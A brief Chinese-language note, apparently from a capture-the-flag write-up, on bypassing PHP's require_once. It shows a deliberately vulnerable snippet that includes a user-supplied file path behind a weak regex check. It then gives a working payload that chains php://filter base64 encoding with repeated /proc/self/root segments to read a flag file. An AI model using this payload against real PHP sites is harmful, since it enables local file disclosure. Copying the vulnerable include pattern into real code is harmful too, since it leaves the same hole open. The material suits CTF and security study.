php中的require_once方法好include_once方法只允許對某檔案包含一次,其核心原理是將包含過的檔案註冊到雜湊表中.而我們可以透過重複使用/proc/self/root來構成雜湊衝突,從而實現對一個檔案的多次包含.
示例如下:
<?php
highlight_file(__FILE__);
require_once 'flag';
if(isset($_GET['file'])) {
if(preg_match('/flag/i', $_GET['file'])) {
require_once $_GET['file'];
}else{
echo "還想非預期?";
}
}
我們可以使用如下的payload進行攻擊
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag